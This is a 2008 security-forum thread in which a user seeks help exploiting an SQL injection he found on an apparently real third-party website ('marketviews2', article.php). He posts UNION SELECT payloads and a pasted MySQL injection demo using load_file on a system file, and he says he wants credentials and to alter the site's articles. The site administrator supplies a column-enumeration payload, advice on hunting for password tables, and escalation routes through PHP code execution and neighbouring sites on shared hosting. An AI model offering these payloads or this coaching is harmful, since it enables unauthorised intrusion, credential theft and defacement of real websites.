Waraxe IT Security Portal
Login or Register
November 16, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 75
Members: 0
Total: 75
Full disclosure
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
4 vulnerabilities in ibmsecurity
32 vulnerabilities in IBM Security Verify Access
xlibre Xnest security advisory & bugfix releases
APPLE-SA-10-29-2024-1 Safari 18.1
SEC Consult SA-20241030-0 :: Query Filter Injection in Ping Identity PingIDM (formerly known as ForgeRock Identity Management) (CVE-2024-23600)
SEC Consult SA-20241023-0 :: Authenticated Remote Code Execution in Multiple Xerox printers (CVE-2024-6333)
APPLE-SA-10-28-2024-8 visionOS 2.1
APPLE-SA-10-28-2024-7 tvOS 18.1
APPLE-SA-10-28-2024-6 watchOS 11.1
APPLE-SA-10-28-2024-5 macOS Ventura 13.7.1
APPLE-SA-10-28-2024-4 macOS Sonoma 14.7.1
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> All other security holes -> pro in SQL injection ??
Post new topicReply to topic View previous topic :: View next topic
pro in SQL injection ??
PostPosted: Fri Jan 25, 2008 11:50 am Reply with quote
nox
Advanced user
Advanced user
Joined: Dec 29, 2007
Posts: 100
Location: c://windows/system32




Sad Hi

i find exploit SQl injection ,where i go to INFORMATION_SCHEMA.TABLES

I find all table db :

CHARACTER_SETS

COLLATIONS

COLLATION_CHARACTER_SET_APPLICABILITY

COLUMNS

COLUMN_PRIVILEGES

ENGINES

EVENTS

FILES

GLOBAL_STATUS

GLOBAL_VARIABLES

KEY_COLUMN_USAGE

PARTITIONS

PLUGINS

PROCESSLIST

REFERENTIAL_CONSTRAINTS

ROUTINES

SCHEMATA

SCHEMA_PRIVILEGES

SESSION_STATUS

SESSION_VARIABLES

STATISTICS

TABLES

TABLE_CONSTRAINTS

TABLE_PRIVILEGES

TRIGGERS

USER_PRIVILEGES

VIEWS

article

article_type

author

cricket_results

date

general

inv_tips

last_ping

mailing_list

m_type

mbb

poll

poll_data

dt_1

test1


when i put : FROM article

i find all Articles ID

but when i put : FROM USER_PRIVILEGES

Query failed == 1146: Table 'marketviews2.USER_PRIVILEGES' doesn't exist

plz Help me ? Confused

_________________
..::::[ Waraxe.us is the BEST and the TOP ]::::..
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
PostPosted: Fri Jan 25, 2008 5:26 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




You see all table names from all databases you have currently access. So those tables are coming from at least 2 databases: "INFORMATION_SCHEMA" and "marketviews2". Table "USER_PRIVILEGES" is residing in "INFORMATION_SCHEMA" database, not in your current database.

In your specific case, all UPPERCASE tables seems to be coming from "INFORMATION_SCHEMA" and lowercase tables are in current database.

So "USER_PRIVILEGES" can be accessed as "INFORMATION_SCHEMA.USER_PRIVILEGES"
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sat Jan 26, 2008 10:31 am Reply with quote
nox
Advanced user
Advanced user
Joined: Dec 29, 2007
Posts: 100
Location: c://windows/system32




THankx Laughing Work 100% , but i can't find name of pass & User

look here :

from information_schema.TABLES

Code:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
ENGINES
EVENTS
FILES
GLOBAL_STATUS
GLOBAL_VARIABLES
KEY_COLUMN_USAGE
PARTITIONS
PLUGINS
PROCESSLIST
REFERENTIAL_CONSTRAINTS
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
SESSION_STATUS
SESSION_VARIABLES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
article
article_type
author
cricket_results
date
general
inv_tips
last_ping
mailing_list
msn_type
msnbb
poll
poll_data
dt_1
test1


mysql> select * from information_schema.USER_PRIVILEGES;
+-----------+---------------+----------------+--------------+
| GRANTEE | TABLE_CATALOG | PRIVILEGE_TYPE | IS_GRANTABLE |
+-----------+---------------+----------------+--------------+
| 'KK1'@'%' | NULL | USAGE | NO |
+-----------+---------------+----------------+--------------+
1 row in set (0.02 sec)

Code:
/article.phpID=-999 UNION SELECT 0,GRANTEE,2,3,4,5,6,7,8,IS_GRANTABLE FROM information_schema.USER_PRIVILEGES;


i find : 'KK1'@'%' and NO

PLZ how i can find PASSWORD ?????
Look here plz : http://www.xfocus.net/articles/200601/847.html

mysql> use information_schema;
Database changed
mysql> show tables;
+---------------------------------------+
| Tables_in_information_schema |
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| KEY_COLUMN_USAGE |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| VIEWS |
| USER_PRIVILEGES |
+---------------------------------------+
16 rows in set (0.17 sec)

mysql> select * from information_schema.USER_PRIVILEGES;
+-----------+---------------+----------------+--------------+
| GRANTEE | TABLE_CATALOG | PRIVILEGE_TYPE | IS_GRANTABLE |
+-----------+---------------+----------------+--------------+
| 'KK1'@'%' | NULL | USAGE | NO |
+-----------+---------------+----------------+--------------+
1 row in set (0.02 sec)

mysql> select TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME from information_schema.STATIS
TICS;
+--------------+------------+-------------+
| TABLE_SCHEMA | TABLE_NAME | COLUMN_NAME |
+--------------+------------+-------------+
| in | article | articleid |
| in | user | userid |
+--------------+------------+-------------+
2 rows in set (0.02 sec)

D:\mysql5\bin>mysql -uroot -p
Enter password: ******
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 4 to server version: 5.0.18

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> use in
Database changed
mysql> delimiter //
mysql> CREATE PROCEDURE test(id INT)
-> BEGIN
-> SELECT * FROM in.USER WHERE USERID=ID;
-> END//
Query OK, 0 rows affected (0.08 sec)

mysql> delimiter ;

mysql> call test(1);
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
| 1 | angel | mypass |
+--------+----------+----------+
1 row in set (0.00 sec)

Query OK, 0 rows affected (0.00 sec)


a¡¢SQL Injection

mysql> call test(1 and 1=1);
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
| 1 | angel | mypass |
+--------+----------+----------+
1 row in set (0.00 sec)

Query OK, 0 rows affected (0.01 sec)

mysql> call test(1 and 1=2);
Empty set (0.00 sec)

Query OK, 0 rows affected (0.00 sec)


mysql> grant SELECT, INSERT, UPDATE, DELETE, EXECUTE
-> ON `IN`.*
-> TO 'KK1'@'%'
-> IDENTIFIED BY 'OBSCURE';
Query OK, 0 rows affected (0.03 sec)

SELECT, INSERT, UPDATE, DELETE, EXECUTEÈ
D:\mysql5\bin>mysql -uKK1 -p
Enter password: ******
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 5 to server version: 5.0.18

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> select ROUTINE_SCHEMA,ROUTINE_NAME,DEFINER,ROUTINE_DEFINITION from inform
ation_schema.ROUTINES;
+----------------+--------------+----------------+--------------------+
| ROUTINE_SCHEMA | ROUTINE_NAME | DEFINER | ROUTINE_DEFINITION |
+----------------+--------------+----------------+--------------------+
| in | test | root@localhost | |
| in | tt | root@localhost | |
+----------------+--------------+----------------+--------------------+
2 rows in set (0.01 sec)


mysql> call in.test(1 and length(load_file('c:/boot.ini'))>0);
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
| 1 | angel | mypass |
+--------+----------+----------+
1 row in set (0.00 sec)

Query OK, 0 rows affected (0.01 sec)

mysql> call in.test(1 and length(load_file('c:/boot.ini'))<0);
Empty set (0.00 sec)

Query OK, 0 rows affected (0.00 sec)



HELP ME WARAXE PLZ

_________________
..::::[ Waraxe.us is the BEST and the TOP ]::::..
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
PostPosted: Sat Jan 26, 2008 1:28 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




I don't think, that you will find any names or passwords in "INFORMATION_SCHEMA". Next move can be COLUMNS enumeration.

Code:

/article.phpID=-1 UNION ALL SELECT 0,TABLE_NAME,2,3,4,5,6,7,8,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS;


Then search for tablenames and column names, which seems to be related with web application auth - anything like "user", "pass", "admin", "login", "account", "email", "editor", "customer", ...
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sat Jan 26, 2008 1:33 pm Reply with quote
nox
Advanced user
Advanced user
Joined: Dec 29, 2007
Posts: 100
Location: c://windows/system32




ok , i dont find password , now i want to Edit article.php

command UPDATE ?


/UNION SELECT 0,1,2,3,4,5,6,7 FROM article--

it work Cool

ALL Column name of Article : title,.....

article:id

article:title

article:author_id

article:date_id

article:add_date

article:edit_date

article:intro

article:body

article:sort

article:link

article:image

article:type

article:status

article:sn_type

article:sn_status

Now tell me how i can Edit Article [ HTML ] UPDATE

thankx for all waraxe

_________________
..::::[ Waraxe.us is the BEST and the TOP ]::::..
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
PostPosted: Sat Jan 26, 2008 1:44 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




It's MySql 5.x, right ??

Then you can't use multiple queries in sql injection. Database modification can be done only with other methods:

1. Find sql injection in UPDATE query, which handles right table
2. Get php level access and execute your own sql queries
3. Find out database credentials and if port 3306 is open to world, try to manipulate database remotely (in most cases impossible, becasue MySql port usually is not open outside the internal network perimeter)
4. If web application has admin/editor backend interface, try to log in and make needed changes. Or elevate privileges from webapp admin/editor/author/moderator/etc to php code execution and then use your own sql queries.
5. If website is located in shared hosting server, then look for neighbour websites on same server and try to find weakest link in order to get access to server. If hosting server security measures are not tight enough, then you may be able to get access to all other website's files and databases ...
View user's profile Send private message Send e-mail Visit poster's website
pro in SQL injection ??
www.waraxe.us Forum Index -> All other security holes
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.044 Seconds